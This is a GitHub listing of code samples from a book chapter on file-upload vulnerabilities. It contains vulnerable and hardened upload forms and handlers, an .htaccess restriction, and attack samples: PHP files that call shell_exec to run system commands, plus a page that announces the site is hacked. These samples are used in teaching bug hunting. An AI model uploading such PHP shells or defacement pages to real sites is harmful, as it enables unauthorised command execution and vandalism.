forked from Apress/bug-hunting-web-security
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Sinha_ch06_Codes
137 lines (107 loc) · 3.18 KB
/
Sinha_ch06_Codes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
//code 6.1
<div class="vulnerable_code_area">
<form enctype="multipart/form-data" action="#" method="POST" />
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose an image to upload:
<br />
<input name="uploaded" type="file" /><br />
<br />
<input type="submit" name="Upload" value="Upload" />
</form>
</div>
--------------------
//code 6.2
//index.php
<form method="POST" action="upload.php" enctype="multipart/form-data">
<div>
<span>Upload a File:</span>
<input type="file" name="uploadedFile" />
</div>
<input type="submit" name="uploadBtn" value="Upload" />
</form>
----------------------
//code 6.3
//upload.php
if (isset($_FILES['uploadedFile']) && $_FILES['uploadedFile']['error'] === UPLOAD_ERR_OK)
{
$fileTmpPath = $_FILES['uploadedFile']['tmp_name'];
$fileName = $_FILES['uploadedFile']['name'];
$fileSize = $_FILES['uploadedFile']['size'];
$fileType = $_FILES['uploadedFile']['type'];
$fileNameCmps = explode(".", $fileName);
$fileExtension = strtolower(end($fileNameCmps));
// sanitizing file-name
$newFileName = md5(time() . $fileName) . '.' . $fileExtension;
// checking if file has one of the following extensions
$allowedfileExtensions = array('jpg', 'jpeg', 'gif', 'png');
if (in_array($fileExtension, $allowedfileExtensions))
{
// directory in which the uploaded file will be moved
$uploadFileDir = './uploaded_files/';
$dest_path = $uploadFileDir . $newFileName;
if(move_uploaded_file($fileTmpPath, $dest_path))
{
echo 'File is successfully uploaded.';
}
else
{
echo 'There was some error moving the file to upload directory. Please make sure the upload directory is writable by web server.';
}
}
else
{
echo 'Upload failed. Allowed file types: ' . implode(',', $allowedfileExtensions);
}
---------------------------
// code 6.4
<?php
$output1 = shell_exec('ls -la');
$output2 = shell_exec('mkdir hacker');
$output3 = shell_exec('cal');
$output4 = shell_exec('pwd');
echo "<pre>$output1</pre>";
echo"<hr>";
echo "<pre>$output2</pre>";
echo 'directory hacker created successfully';
echo"<hr>";
echo "<pre>$output3</pre>";
echo"<hr>";
echo "<pre>$output4</pre>";
?>
---------------------------
//code 6.5
//.htaccess
deny from all <
files ~ "^w+.(gif|jpe?g|png)$">
order deny,allow
allow from all
</files>
------------------------------
//code 6.6
<?php
$output1 = shell_exec('ls -la');
$output2 = shell_exec('mkdir hacker');
echo "<pre>$output1</pre>";
echo"<hr>";
echo "<pre>$output2</pre>";
echo 'directory hacker created successfully';
echo"<hr>";
?>
-------------------------
//code 6.7
<?php
echo "<h1>This site is hacked!</h1>";
------------------------
//code 6.8
<div class="vulnerable_code_area">
<form enctype="multipart/form-data" action="#" method="POST" />
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose an image to upload:
<br />
<input name="uploaded" type="file" /><br />
<br />
<input type="submit" name="Upload" value="Upload" />
</form>
<pre>../../hackable/uploads/x.php succesfully uploaded!</pre>
</div>
----------------------------